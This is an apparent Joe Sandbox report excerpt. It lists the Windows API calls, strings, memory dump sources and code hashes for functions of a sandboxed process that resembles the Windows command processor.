  • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
  • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
  • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
  • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC3514
• _get_osfhandle.MSVCRT ref: 00007FF706EC3522
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC3541
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC355E
  • Part of subcall function 00007FF706EC36EC: _get_osfhandle.MSVCRT ref: 00007FF706EC3715
  • Part of subcall function 00007FF706EC36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC3770
  • Part of subcall function 00007FF706EC36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC3791
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
• String ID:
• API String ID: 4057327938-0
• Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
• Instruction ID: a74825b5d7cc602aeb656855faef3e3429d843fcbec7fe86b0a54b3a78d11cda
• Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
• Instruction Fuzzy Hash: 21316026B08B42D6E750BB25AC2107BFAA1FF89751FC88175DA4E43795DF3CE8468620
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
• String ID: KEYS$LIST$OFF
• API String ID: 411561164-4129271751
• Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
• Instruction ID: 0bd1510264ad6a525eca875750ddf7de9561fe2ef1ab86ed7f2fb28c4ccdd0e8
• Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
• Instruction Fuzzy Hash: 25215E64E08B07C1FA14BB25AC6117BE6A1FF98794FD59231CA1E472E4EF3CA4448620
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC01C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC01D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC0212
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC0228
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC023C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706ECE904,?,?,?,?,00000000,00007FF706EC3491,?,?,?,00007FF706ED4420), ref: 00007FF706EC0251
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706ED71F9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706ED720D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706ED7300
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706ED5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF706ED75C4,?,?,00000000,00007FF706ED6999,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED5744
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 455305043-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2401724867-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3849470556-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706ED9A10
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED9994
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EDA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA77A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EDA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA839
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EDA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF706ED9A82), ref: 00007FF706EDA850
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00007FF706ED9A62
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$.
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3242694432-4275322459
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 657d44de7f6b5ecddd613e3e1e7a3ee861e3239897d6ce1885c906d94e02afc4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE41AF22E0974285EA10BB51AD702BBE2A1BF857A4FD85230DE5D077D6EF7CE8458320
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706ED54E6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706ED552E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706ED758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF706ED6999,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED75AE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706ED758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF706ED6999,?,?,?,?,?,00007FF706EC8C39), ref: 00007FF706ED75C6
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 779401067-630742106
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c6f85b2a1a120c6f61cbc2b48ff31e8e7db16a8a4b4009d3680eff4c0e66504d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58516076A1878682EB21AB15EC207FBE361FF84784F985032EB4D4BA95DF3DD5058720
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 238703822-3780739392
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 55020af0e3c8db5d59f99bfd41cd1ebab45ea734df5c727de7500f6e5232d4ca
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08113452608341C5EB25AB21AC2427BFAE0FF49BA9F858032DD4D0B790DF3CD0068724
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcsrchr$wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 110935159-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1403193329-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EB921C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EB93AA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: wcsrchr.MSVCRT ref: 00007FF706EB8BAB
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: _wcsicmp.MSVCRT ref: 00007FF706EB8BD4
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: _wcsicmp.MSVCRT ref: 00007FF706EB8BF2
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB8C16
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EB8C2F
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB8B20: wcschr.MSVCRT ref: 00007FF706EB8CB3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC41AD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF706EB92AC), ref: 00007FF706EC30CA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3060: SetErrorMode.KERNELBASE ref: 00007FF706EC30DD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC30F6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3060: SetErrorMode.KERNELBASE ref: 00007FF706EC3106
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00007FF706EB92D8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EB9362
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EB9373
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3966000956-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 977ddb7334231f0fb79e58d847cc18ce7d8a205318ce9d3259cb9fa5e55b7673
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED51C632A09B8286EB61AF21DC642BBB3A4FF49B94F845135DA4D07B95DF3CE551C310
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3883041866-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 30e3a8a30b0ae18a42ff0cb7f8434969e44d07dc626e8bcde63ec9e8a15926df
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
